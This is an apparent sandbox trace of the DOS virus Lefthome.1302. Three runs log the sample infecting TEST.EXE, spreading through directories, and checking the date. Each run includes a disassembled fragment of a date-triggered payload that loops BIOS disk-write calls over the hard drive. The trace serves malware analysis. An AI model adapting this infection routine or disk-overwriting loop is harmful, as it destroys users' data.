Sample viewer

vx.netlux.org/Virus.DOS.Lefthome.1302

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:27:28.047779744Z 25 PC: 12b89 | Get default drive
2018-12-17T22:27:28.049212836Z 71 PC: 12b9c | Get current directory
2018-12-17T22:27:28.052923062Z 26 PC: 12ba4 | Set disk transfer address
2018-12-17T22:27:28.054552078Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.061771393Z 61 PC: 12bf8 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:27:28.070876807Z 63 PC: 12c07 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:27:28.074122716Z 62 PC: 12c0b | Close file
2018-12-17T22:27:28.078020342Z 67 PC: 12c29 | Get or set file attributes
2018-12-17T22:27:28.114555239Z 61 PC: 12c37 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:27:28.122412939Z 63 PC: 12c47 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:27:28.125391095Z 66 PC: 12c77 | Move file pointer
2018-12-17T22:27:28.127513818Z 64 PC: 12c82 | Write file or device (Write 257 bytes on handle 5)
2018-12-17T22:27:28.136583765Z 64 PC: 12c8e | Write file or device (Write 356 bytes on handle 5)
2018-12-17T22:27:28.145414215Z 64 PC: 12c9a | Write file or device (Write 689 bytes on handle 5)
2018-12-17T22:27:28.155419132Z 66 PC: 12ce3 | Move file pointer
2018-12-17T22:27:28.157340587Z 66 PC: 12cfb | Move file pointer
2018-12-17T22:27:28.158735844Z 64 PC: 12d06 | Write file or device (Write 28 bytes on handle 5)
2018-12-17T22:27:28.161703449Z 87 PC: 12d1c | Get or set file date and time
2018-12-17T22:27:28.164576133Z 62 PC: 12d20 | Close file
2018-12-17T22:27:28.173944334Z 67 PC: 12d30 | Get or set file attributes
2018-12-17T22:27:28.185170614Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.191903441Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.199211606Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.202160559Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.208049872Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.220385548Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.223071573Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.225368788Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.239510223Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.24257279Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.245473486Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.253489958Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.256238434Z 42 PC: 12d85 | Get date
0x12d85: cmp dx, 0x909
0x12d89: jne 0x12e06
0x12d8b: mov ah, 8
0x12d8d: int 0x13
0x12d8f: xchg dl, dh
0x12d91: xor dh, dh
0x12d93: mov si, dx
0x12d95: mov dh, 0
0x12d97: mov dl, 0x80
0x12d99: mov cx, 1
0x12d9c: cli
0x12d9d: mov ax, 0x30f
0x12da0: int 0x13
0x12da2: inc dh
0x12da4: inc ch
0x12da6: dec si
0x12da7: jne 0x12d9c
0x12da9: mov ax, 0xd
0x12dac: int 0x10
0x12dae: mov ah, 0xe
2018-12-17T22:27:28.258897448Z 59 PC: 12d64 | Change current directory
2018-12-17T22:27:28.263930054Z 26 PC: 12d74 | Set disk transfer address
2018-12-17T22:27:28.265368278Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-17T22:27:28.282548585Z 76 PC: 12acc | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":9,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4886,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:11.056139125Z 25 PC: 12b89 | Get default drive
2018-12-25T11:53:11.058187037Z 71 PC: 12b9c | Get current directory
2018-12-25T11:53:11.061247675Z 26 PC: 12ba4 | Set disk transfer address
2018-12-25T11:53:11.062781723Z 78 PC: 12bd8 | Find first file
2018-12-25T11:53:11.068982128Z 61 PC: 12bf8 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.076229845Z 63 PC: 12c07 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:53:11.078450174Z 62 PC: 12c0b | Close file
2018-12-25T11:53:11.080202971Z 67 PC: 12c29 | Get or set file attributes
2018-12-25T11:53:11.095051108Z 61 PC: 12c37 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.106890288Z 63 PC: 12c47 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T11:53:11.116758457Z 66 PC: 12c77 | Move file pointer
2018-12-25T11:53:11.118535849Z 64 PC: 12c82 | Write file or device (Write 257 bytes on handle 5)
2018-12-25T11:53:11.125798445Z 64 PC: 12c8e | Write file or device (Write 356 bytes on handle 5)
2018-12-25T11:53:11.131161158Z 64 PC: 12c9a | Write file or device (Write 689 bytes on handle 5)
2018-12-25T11:53:11.14091544Z 66 PC: 12ce3 | Move file pointer
2018-12-25T11:53:11.148698236Z 66 PC: 12cfb | Move file pointer
2018-12-25T11:53:11.150124748Z 64 PC: 12d06 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T11:53:11.153526585Z 87 PC: 12d1c | Get or set file date and time
2018-12-25T11:53:11.16283224Z 62 PC: 12d20 | Close file
2018-12-25T11:53:11.170552465Z 67 PC: 12d30 | Get or set file attributes
2018-12-25T11:53:11.17800797Z 59 PC: 12e0b | Change current directory
2018-12-25T11:53:11.181238297Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.185007572Z 79 PC: 12be0 | Find next file
2018-12-25T11:53:11.187366598Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.191499406Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.19704085Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.199303946Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.201191734Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.20692192Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.208467932Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.209968917Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.213611054Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.215151074Z 42 PC: 12d85 | Get date
0x12d85: cmp dx, 0x909
0x12d89: jne 0x12e06
0x12d8b: mov ah, 8
0x12d8d: int 0x13
0x12d8f: xchg dl, dh
0x12d91: xor dh, dh
0x12d93: mov si, dx
0x12d95: mov dh, 0
0x12d97: mov dl, 0x80
0x12d99: mov cx, 1
0x12d9c: cli
0x12d9d: mov ax, 0x30f
0x12da0: int 0x13
0x12da2: inc dh
0x12da4: inc ch
0x12da6: dec si
0x12da7: jne 0x12d9c
0x12da9: mov ax, 0xd
0x12dac: int 0x10
0x12dae: mov ah, 0xe

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4886,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:11.249677934Z 25 PC: 12b89 | Get default drive
2018-12-25T11:53:11.251896151Z 71 PC: 12b9c | Get current directory
2018-12-25T11:53:11.255184123Z 26 PC: 12ba4 | Set disk transfer address
2018-12-25T11:53:11.256938206Z 78 PC: 12bd8 | Find first file
2018-12-25T11:53:11.265018052Z 61 PC: 12bf8 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.27327666Z 63 PC: 12c07 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:53:11.276266297Z 62 PC: 12c0b | Close file
2018-12-25T11:53:11.278382104Z 67 PC: 12c29 | Get or set file attributes
2018-12-25T11:53:11.570197897Z 61 PC: 12c37 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.577949774Z 63 PC: 12c47 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T11:53:11.581295044Z 66 PC: 12c77 | Move file pointer
2018-12-25T11:53:11.584404885Z 64 PC: 12c82 | Write file or device (Write 257 bytes on handle 5)
2018-12-25T11:53:11.593382975Z 64 PC: 12c8e | Write file or device (Write 356 bytes on handle 5)
2018-12-25T11:53:11.602012136Z 64 PC: 12c9a | Write file or device (Write 689 bytes on handle 5)
2018-12-25T11:53:11.612004671Z 66 PC: 12ce3 | Move file pointer
2018-12-25T11:53:11.613707136Z 66 PC: 12cfb | Move file pointer
2018-12-25T11:53:11.615268483Z 64 PC: 12d06 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T11:53:11.618618992Z 87 PC: 12d1c | Get or set file date and time
2018-12-25T11:53:11.620922129Z 62 PC: 12d20 | Close file
2018-12-25T11:53:11.633083041Z 67 PC: 12d30 | Get or set file attributes
2018-12-25T11:53:11.644937946Z 59 PC: 12e0b | Change current directory
2018-12-25T11:53:11.654053717Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.66057314Z 79 PC: 12be0 | Find next file
2018-12-25T11:53:11.663037028Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.68278375Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.698964205Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.70142269Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.704577215Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.711081423Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.714559765Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.721899174Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.728735758Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.73145679Z 42 PC: 12d85 | Get date
0x12d85: cmp dx, 0x909
0x12d89: jne 0x12e06
0x12d8b: mov ah, 8
0x12d8d: int 0x13
0x12d8f: xchg dl, dh
0x12d91: xor dh, dh
0x12d93: mov si, dx
0x12d95: mov dh, 0
0x12d97: mov dl, 0x80
0x12d99: mov cx, 1
0x12d9c: cli
0x12d9d: mov ax, 0x30f
0x12da0: int 0x13
0x12da2: inc dh
0x12da4: inc ch
0x12da6: dec si
0x12da7: jne 0x12d9c
0x12da9: mov ax, 0xd
0x12dac: int 0x10
0x12dae: mov ah, 0xe
2018-12-25T11:53:11.734962477Z 59 PC: 12d64 | Change current directory
2018-12-25T11:53:11.740188445Z 26 PC: 12d74 | Set disk transfer address
2018-12-25T11:53:11.74192432Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-25T11:53:11.759078165Z 76 PC: 12acc | Terminate with return code (Return code = '36')